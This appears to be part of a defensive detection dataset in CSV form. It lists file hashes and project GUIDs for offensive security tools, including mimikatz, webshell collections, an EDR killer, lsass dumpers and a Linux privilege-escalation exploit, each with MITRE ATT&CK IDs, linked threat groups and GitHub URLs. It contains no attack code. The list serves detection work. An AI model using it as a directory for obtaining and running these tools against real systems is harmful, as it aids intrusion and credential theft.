"*d8dd09b01eb4e363d88ff53c0aace04c39dbea822b7adba7a883970abbf72a77*",".{0,1000}d8dd09b01eb4e363d88ff53c0aace04c39dbea822b7adba7a883970abbf72a77.{0,1000}","offensive_tool_keyword","POC","local privilege escalation Proof-of-Concept exploit for CVE-2024-1086 working on most Linux kernels between v5.14 and v6.6","T1068 - T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Notselwyn/CVE-2024-1086","1","0","#filehash #linux","CVE-2024-1086 POC","10","10","2357","314","2024-04-17T16:09:54Z","2024-03-20T21:16:41Z","39975"
"*d8e73a53beb2ef23df43e85a336b235db7dfb075c03aa13534a9881d25c887d5*",".{0,1000}d8e73a53beb2ef23df43e85a336b235db7dfb075c03aa13534a9881d25c887d5.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","39977"
"*d8edc288ad36a1dc853851dfe2255647e17020a528f64ca22b07258f3c918118*",".{0,1000}d8edc288ad36a1dc853851dfe2255647e17020a528f64ca22b07258f3c918118.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","39978"
"*D8FC3807-CEAA-4F6A-9C8F-CC96F99D1F04*",".{0,1000}D8FC3807\-CEAA\-4F6A\-9C8F\-CC96F99D1F04.{0,1000}","offensive_tool_keyword","TrickDump","Dump lsass using only NTAPIS running 3 programs to create 3 JSON and 1 ZIP file and generate the Minidump later!","T1003.001 - T1027.002 - T1106 - T1212","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/ricardojoserf/TrickDump","1","0","#GUIDproject","N/A","10","5","444","50","2025-02-06T20:49:56Z","2024-06-24T12:24:59Z","39979"
"*d901c1e7b3825ddc88e962d4cf7846e86041b7374c853e8592934857992e1e8b*",".{0,1000}d901c1e7b3825ddc88e962d4cf7846e86041b7374c853e8592934857992e1e8b.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","39981"
"*d906be8835b28606430351e62d19d007371cceddd480522ab2469695772fca60*",".{0,1000}d906be8835b28606430351e62d19d007371cceddd480522ab2469695772fca60.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","39983"
"*d907d7686b725441db1deb645a7079ca79f4dd1d8a18ca4b2bb98c12622603ef*",".{0,1000}d907d7686b725441db1deb645a7079ca79f4dd1d8a18ca4b2bb98c12622603ef.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","#filehash","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","39984"
"*d90ebaede19390d74f136a83ea5c391f1b550322295c22d5427d62c2d573c197*",".{0,1000}d90ebaede19390d74f136a83ea5c391f1b550322295c22d5427d62c2d573c197.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/BeichenDream/Godzilla","1","0","#filehash","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","39986"
"*D90EFC93-2F8B-4427-B967-0E78ED45611E*",".{0,1000}D90EFC93\-2F8B\-4427\-B967\-0E78ED45611E.{0,1000}","offensive_tool_keyword","Darkside","C# AV/EDR Killer using less-known driver (BYOVD)","T1547.006 - T1055 - T1562.001","TA0005 - TA0003 - TA0004  ","N/A","N/A","Defense Evasion","https://github.com/ph4nt0mbyt3/Darkside","1","0","#GUIDproject","N/A","10","2","175","34","2023-11-10T16:01:21Z","2023-11-10T15:34:20Z","39987"
"*d90f7aa9599ba9ec2b9d356db62aed30fad6daf4df8075de7b2bb7c585fce67c*",".{0,1000}d90f7aa9599ba9ec2b9d356db62aed30fad6daf4df8075de7b2bb7c585fce67c.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","39988"
"*d9137008fdb0e917c996162abb1b6d457b20c987958d4a5e496edc9666fa8392*",".{0,1000}d9137008fdb0e917c996162abb1b6d457b20c987958d4a5e496edc9666fa8392.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","39990"
"*d914afd1408ddbf0aa5180434bb1713748af7d4936724b392a0a2e0307ed9dab*",".{0,1000}d914afd1408ddbf0aa5180434bb1713748af7d4936724b392a0a2e0307ed9dab.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","#filehash","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","39991"
"*d919b4832a03cd1cc4c40803238e172dc2edd74317967546c4e485de14ddc5ba*",".{0,1000}d919b4832a03cd1cc4c40803238e172dc2edd74317967546c4e485de14ddc5ba.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","39992"
"*d9220ac56637a1596427cce73d29ad64dec4669bd600d3c41effc512d15c3b6b*",".{0,1000}d9220ac56637a1596427cce73d29ad64dec4669bd600d3c41effc512d15c3b6b.{0,1000}","offensive_tool_keyword","ElusiveMice","Cobalt Strike User-Defined Reflective Loader with AV/EDR Evasion in mind","T1620 - T1055.012 - T1202","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/mgeeky/ElusiveMice","1","0","#filehash","N/A","10","5","449","78","2023-07-12T17:54:07Z","2021-08-27T19:22:20Z","39993"
"*d92aeb275dc177206baa4ac355fa43c13bd53d309247b61a7fa563a062f15ecd*",".{0,1000}d92aeb275dc177206baa4ac355fa43c13bd53d309247b61a7fa563a062f15ecd.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","39994"
"*d92b4a40c783bf64d9117a9daf35b4f75426f7f1743d9939d756b327f608eda7*",".{0,1000}d92b4a40c783bf64d9117a9daf35b4f75426f7f1743d9939d756b327f608eda7.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","39995"
"*d92e344caa4b6b913bad4f77a2bd6e771434a95a4fd2c8cea0fec75edba58568*",".{0,1000}d92e344caa4b6b913bad4f77a2bd6e771434a95a4fd2c8cea0fec75edba58568.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","39996"
"*D934058E-A7DB-493F-A741-AE8E3DF867F4*",".{0,1000}D934058E\-A7DB\-493F\-A741\-AE8E3DF867F4.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","0","#GUIDproject","N/A","N/A","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","39997"
"*D934058E-A7DB-493F-A741-AE8E3DF867F4*",".{0,1000}D934058E\-A7DB\-493F\-A741\-AE8E3DF867F4.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#GUIDproject","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","39998"
"*d941534ce99193cc7771684318af13748af81cf4a9a5b4fb02c791e066b563b2*",".{0,1000}d941534ce99193cc7771684318af13748af81cf4a9a5b4fb02c791e066b563b2.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","39999"
"*d945ab8284b62d5c8471a5eb71a852ba36b18770a7d334c952eb8367daf11e7b*",".{0,1000}d945ab8284b62d5c8471a5eb71a852ba36b18770a7d334c952eb8367daf11e7b.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","40000"
"*d94ce7fd1fd2012d893891f6577ec1f978aea6165d003120f7d057f25e767645*",".{0,1000}d94ce7fd1fd2012d893891f6577ec1f978aea6165d003120f7d057f25e767645.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","40003"
"*d94e140fdb653c7fbfbc293a5f5ec37b012470dc4c2767b0040daf54aafb47f9*",".{0,1000}d94e140fdb653c7fbfbc293a5f5ec37b012470dc4c2767b0040daf54aafb47f9.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","40004"
"*d94e140fdb653c7fbfbc293a5f5ec37b012470dc4c2767b0040daf54aafb47f9*",".{0,1000}d94e140fdb653c7fbfbc293a5f5ec37b012470dc4c2767b0040daf54aafb47f9.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","40005"
"*d95bb95780308e82ee8ab7e0a2bb1867a94ab91f96ce11413ba02a15a16750f9*",".{0,1000}d95bb95780308e82ee8ab7e0a2bb1867a94ab91f96ce11413ba02a15a16750f9.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","40006"
"*d9770865ea739a8f1702a2651538f4f4de2d92888d188d8ace2c79936f9c2688*",".{0,1000}d9770865ea739a8f1702a2651538f4f4de2d92888d188d8ace2c79936f9c2688.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","40007"
"*d9770865ea739a8f1702a2651538f4f4de2d92888d188d8ace2c79936f9c2688*",".{0,1000}d9770865ea739a8f1702a2651538f4f4de2d92888d188d8ace2c79936f9c2688.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","40008"
"*d97e7cfd07d94c8282968f0334349056364f4e040a649f43577b9992204e2790*",".{0,1000}d97e7cfd07d94c8282968f0334349056364f4e040a649f43577b9992204e2790.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","40009"
"*d97f43bd7924dfd635d36d53e2bf95c850f36bf2210d159aa602b87162aceaa6*",".{0,1000}d97f43bd7924dfd635d36d53e2bf95c850f36bf2210d159aa602b87162aceaa6.{0,1000}","offensive_tool_keyword","AppProxyC2","simple POC to show how to tunnel traffic through Azure Application Proxy","T1090 - T1572 - T1071","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/xpn/AppProxyC2","1","0","#filehash","N/A","9","10","69","18","2021-04-21T13:02:15Z","2021-04-21T10:46:16Z","40010"
"*d98257f09b98cbb4c3241bd07a49c3acbef8face07820d52ffad0ab030c9a4c6*",".{0,1000}d98257f09b98cbb4c3241bd07a49c3acbef8face07820d52ffad0ab030c9a4c6.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","40011"
"*d9845e849fc9239f6f2342103defd46e0fd67d11d54b152cd7d9645e892eca15*",".{0,1000}d9845e849fc9239f6f2342103defd46e0fd67d11d54b152cd7d9645e892eca15.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","40012"
"*d987f5f570ddac113c3083de784aac66b7550f639fb0cdd6d88bed99ae21821c*",".{0,1000}d987f5f570ddac113c3083de784aac66b7550f639fb0cdd6d88bed99ae21821c.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/leviathansecurity/TunnelVision","1","0","#filehash","N/A","9","2","132","17","2024-05-08T19:40:13Z","2024-03-11T22:24:56Z","40013"
"*d98fe823414e86c47619bc51a10d542d5be44ab64387e578ba4c21bf8cef9e15*",".{0,1000}d98fe823414e86c47619bc51a10d542d5be44ab64387e578ba4c21bf8cef9e15.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","40014"
"*d9908a88e10620582a234427cb1029dbc914ecce23b98f95e065d25ea08bcde2*",".{0,1000}d9908a88e10620582a234427cb1029dbc914ecce23b98f95e065d25ea08bcde2.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","40015"
"*d9940f5a09a04a949545eedb6818ce0ce001cc7596a63959e0940d31b6dc4834*",".{0,1000}d9940f5a09a04a949545eedb6818ce0ce001cc7596a63959e0940d31b6dc4834.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#filehash","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","40016"
"*d99a506000fb5bb53cc19e3b33f742db07b36b8e6f71375584faf9308474a9e4*",".{0,1000}d99a506000fb5bb53cc19e3b33f742db07b36b8e6f71375584faf9308474a9e4.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","40017"
"*d99bc545d75d6d7bcb95e5cebb2f469da2c0778b6ee294e190f02100b8a4f0a7*",".{0,1000}d99bc545d75d6d7bcb95e5cebb2f469da2c0778b6ee294e190f02100b8a4f0a7.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","40018"
"*d99dc267a1f57d53c4c3692457e669326615010fd35011ef2c1ce18239344869*",".{0,1000}d99dc267a1f57d53c4c3692457e669326615010fd35011ef2c1ce18239344869.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","40019"
"*d99f3036f858ed7c0ff1da150b7bcc8a41b0fd422e36f9d6843091221ea5be01*",".{0,1000}d99f3036f858ed7c0ff1da150b7bcc8a41b0fd422e36f9d6843091221ea5be01.{0,1000}","offensive_tool_keyword","Sublist3r","Sublist3r is a python tool designed to enumerate subdomains of websites using OSINT. It helps penetration testers and bug hunters collect and gather subdomains for the domain they are targeting. Sublist3r enumerates subdomains using many search engines such as Google. Yahoo. Bing. Baidu and Ask. Sublist3r also enumerates subdomains using Netcraft. Virustotal. ThreatCrowd. DNSdumpster and ReverseDNS. subbrute was integrated with Sublist3r to increase the possibility of finding more subdomains using bruteforce with an improved wordlist. The credit goes to TheRook who is the author of subbrute.","T1210.001 - T1190 - T1574.001","TA0007 - TA0002 - TA0010","N/A","ENERGETIC BEAR","Reconnaissance","https://github.com/aboul3la/Sublist3r","1","0","#filehash","N/A","5","10","10300","2148","2024-08-02T00:00:30Z","2015-12-15T00:55:25Z","40020"
"*d9a081fa68e6e0450c6f04497d7926f1e8a2fbcc2893ffeffe6aec1ee1ab283f*",".{0,1000}d9a081fa68e6e0450c6f04497d7926f1e8a2fbcc2893ffeffe6aec1ee1ab283f.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","40021"
"*d9a59aa8f8ad46ccf0f3a9ed564c3774ec4d7153bae8795b6668e9b850c08533*",".{0,1000}d9a59aa8f8ad46ccf0f3a9ed564c3774ec4d7153bae8795b6668e9b850c08533.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","40022"
"*d9adb9ecfa37595ce0dd2d8b4841334b32243bd30455fba4f59ce44a33efcdc4*",".{0,1000}d9adb9ecfa37595ce0dd2d8b4841334b32243bd30455fba4f59ce44a33efcdc4.{0,1000}","offensive_tool_keyword","adfsbrute","test credentials against Active Directory Federation Services (ADFS) allowing password spraying or bruteforce attacks","T1110.003 - T1110.001 - T1110","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/ricardojoserf/adfsbrute","1","0","#filehash","N/A","8","2","172","33","2021-04-23T16:43:59Z","2020-10-02T16:28:35Z","40023"
